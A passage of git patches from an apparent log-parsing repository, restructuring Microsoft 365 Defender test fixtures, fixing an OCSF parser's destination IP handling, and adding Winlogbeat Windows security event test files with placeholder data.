"{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "iam" diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json index 6077ecfdc..3e55ad2b0 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json index f33a1eb87..55684497d 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json index 3cedbfdb3..5a6e54961 100644 --- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json +++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 3a5d48cd4..9304ca1cb 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json @@ -22,10 +22,14 @@ "@timestamp": "2024-09-24T14:18:11.864114Z", "action": { "properties": { - "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", - "InitiatingProcessFileSize": 11864, - "InitiatingProcessLogonId": "0", - "LogonId": "0" + "LogonId": "0", + "process": { + "parent": { + "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "FileSize": 11864, + "LogonId": "0" + } + } }, "type": "ProcessCreated" }, @@ -55,30 +59,36 @@ "-F", "smtpd_tls_protocols\\commandtest" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "grep -F smtpd_tls_protocols\\commandtest", - "executable": "/usr/test/platform-python3.6", - "hash": { - "md5": "eeeee2999444ddaaaaa08598b06eafe7", - "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", - "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" - }, - "name": "platform-python3.6", + "name": "grep", "parent": { + "args": [ + "--register", + "/usr/lib/python3.6/run.py" + ], + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "executable": "/usr/test/platform-python3.6", + "hash": { + "md5": "eeeee2999444ddaaaaa08598b06eafe7", + "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", + "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" + }, "name": "platform-python3.6", - "pid": 408229, - "start": "2024-09-24T14:17:34.790000Z" + "pid": 408996, + "start": "2024-09-24T14:18:11.850000Z", + "user": { + "domain": "testdomain", + "name": "testaccount" + }, + "working_directory": "/usr/test" }, "pid": 408996, "start": "2024-09-24T14:18:11.864114Z", - "user": { - "domain": "testdomain", - "name": "testaccount" - }, - "working_directory": "/usr/test" + "working_directory": "/usr/bin" }, "related": { "hash": [ From 99b7d065b680791ad270f5eb80aa0b40480c6650 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 14 Nov 2024 09:20:57 +0100 Subject: [PATCH 033/150] fix(OCSF): fix destination.ip --- OCSF/ocsf/ingest/parser.yml | 4 +- OCSF/ocsf/tests/test_network_activity_7.json | 42 ++++++++++++++++++++ 2 files changed, 45 insertions(+), 1 deletion(-) create mode 100644 OCSF/ocsf/tests/test_network_activity_7.json diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 765a6a76d..e43994811 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml @@ -567,9 +567,11 @@ stages: destination.domain: "{{ parse_event.message.dst_endpoint.hostname }}" filter: "{{ parse_event.message.dst_endpoint.get('hostname') != None }}" - set: - destination.ip: "{{ parse_event.message.dst_endpoint.ip }}" destination.mac: "{{ parse_event.message.dst_endpoint.mac }}" destination.port: "{{ parse_event.message.dst_endpoint.port }}" + - set: + destination.ip: "{{ parse_event.message.dst_endpoint.ip }}" + filter: "{{ parse_event.message.dst_endpoint.ip | is_ipaddress }}" - set: network.application: "{{ parse_event.message.dst_endpoint.svc_name }}" filter: "{{ parse_event.message.dst_endpoint.get('svc_name') != None }}" diff --git a/OCSF/ocsf/tests/test_network_activity_7.json b/OCSF/ocsf/tests/test_network_activity_7.json new file mode 100644 index 000000000..271c6e7a2 --- /dev/null +++ b/OCSF/ocsf/tests/test_network_activity_7.json @@ -0,0 +1,42 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "OCSF [BETA]", + "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" + } + }, + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n" + }, + "expected": { + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", + "event": { + "action": "unknown", + "category": [ + "network" + ], + "end": "2024-11-13T20:24:18Z", + "kind": "event", + "severity": 1, + "start": "2024-11-13T20:23:47Z", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-13T20:23:47Z", + "cloud": { + "account": { + "id": "111111111111" + }, + "availability_zone": "euw3-az1", + "provider": "AWS", + "region": "eu-west-3" + }, + "ocsf": { + "activity_id": 0, + "activity_name": "Unknown", + "class_name": "Network Activity", + "class_uid": 4001 + } + } +} \ No newline at end of file From b2374d10776dfee644f3660f54064d4ce87002b8 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 14 Nov 2024 09:23:57 +0100 Subject: [PATCH 034/150] fix(OCSF): apply linter --- OCSF/ocsf/tests/test_network_activity_7.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/OCSF/ocsf/tests/test_network_activity_7.json b/OCSF/ocsf/tests/test_network_activity_7.json index 271c6e7a2..c6192eda7 100644 --- a/OCSF/ocsf/tests/test_network_activity_7.json +++ b/OCSF/ocsf/tests/test_network_activity_7.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", "sekoiaio": { "intake": { "dialect": "OCSF [BETA]", "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" } - }, - "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n" + } }, "expected": { "message": "{\"metadata\":{\"product\":{\"version\":\"5\",\"name\":\"Amazon VPC\",\"feature\":{\"name\":\"Flowlogs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"zone\":\"euw3-az1\",\"provider\":\"AWS\"},\"src_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":\"eni-11111111111111111\",\"vpc_uid\":\"vpc-11111111111111111\",\"instance_uid\":\"-\",\"subnet_uid\":\"subnet-11111111111111111\"},\"dst_endpoint\":{\"port\":null,\"svc_name\":\"-\",\"ip\":\"-\",\"intermediate_ips\":null,\"interface_uid\":null,\"vpc_uid\":null,\"instance_uid\":null,\"subnet_uid\":null},\"connection_info\":{\"protocol_num\":null,\"tcp_flags\":null,\"protocol_ver\":\"-\",\"boundary_id\":99,\"boundary\":null,\"direction_id\":99,\"direction\":\"-\"},\"traffic\":null,\"time\":1731529427000,\"time_dt\":1731529427000,\"start_time_dt\":1731529427000,\"end_time_dt\":1731529458000,\"status_code\":\"NODATA\",\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"Network Activity\",\"class_uid\":4001,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_name\":\"Unknown\",\"activity_id\":0,\"action\":\"-\",\"action_id\":99,\"disposition\":\"-\",\"type_uid\":400100,\"type_name\":\"Network Activity: Unknown\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"unmapped\":[[\"sublocation_id\",\"-\"],[\"sublocation_type\",\"-\"]],\"observables\":null}\n", From 943de11e6ab15711fa104a51ee2e5a41b90a3ab5 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 11:41:51 +0100 Subject: [PATCH 035/150] Enhancement/Winlogbeat: Addition of new events --- .../winlogbeat/tests/security_event_4624.json | 145 +++++++++++++ .../winlogbeat/tests/security_event_4625.json | 193 ++++++++++++++++++ .../winlogbeat/tests/security_event_4634.json | 112 ++++++++++ .../winlogbeat/tests/security_event_4662.json | 105 ++++++++++ .../winlogbeat/tests/security_event_4672.json | 82 ++++++++ .../winlogbeat/tests/security_event_4689.json | 88 ++++++++ .../winlogbeat/tests/security_event_4720.json | 127 ++++++++++++ .../winlogbeat/tests/security_event_4722.json | 111 ++++++++++ .../winlogbeat/tests/security_event_4723.json | 112 ++++++++++ .../winlogbeat/tests/security_event_4725.json | 111 ++++++++++ .../winlogbeat/tests/security_event_4726.json | 84 ++++++++ .../winlogbeat/tests/security_event_4768.json | 102 +++++++++ .../winlogbeat/tests/security_event_4769.json | 101 +++++++++ .../winlogbeat/tests/security_event_4798.json | 114 +++++++++++ .../winlogbeat/tests/security_event_5140.json | 5 - .../winlogbeat/tests/security_event_5145.json | 7 - 16 files changed, 1587 insertions(+), 12 deletions(-) create mode 100644 Beats/winlogbeat/tests/security_event_4624.json create mode 100644 Beats/winlogbeat/tests/security_event_4625.json create mode 100644 Beats/winlogbeat/tests/security_event_4634.json create mode 100644 Beats/winlogbeat/tests/security_event_4662.json create mode 100644 Beats/winlogbeat/tests/security_event_4672.json create mode 100644 Beats/winlogbeat/tests/security_event_4689.json create mode 100644 Beats/winlogbeat/tests/security_event_4720.json create mode 100644 Beats/winlogbeat/tests/security_event_4722.json create mode 100644 Beats/winlogbeat/tests/security_event_4723.json create mode 100644 Beats/winlogbeat/tests/security_event_4725.json create mode 100644 Beats/winlogbeat/tests/security_event_4726.json create mode 100644 Beats/winlogbeat/tests/security_event_4768.json create mode 100644 Beats/winlogbeat/tests/security_event_4769.json create mode 100644 Beats/winlogbeat/tests/security_event_4798.json diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json new file mode 100644 index 000000000..9e8cdfb26 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4624.json @@ -0,0 +1,145 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}" + }, + "expected": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 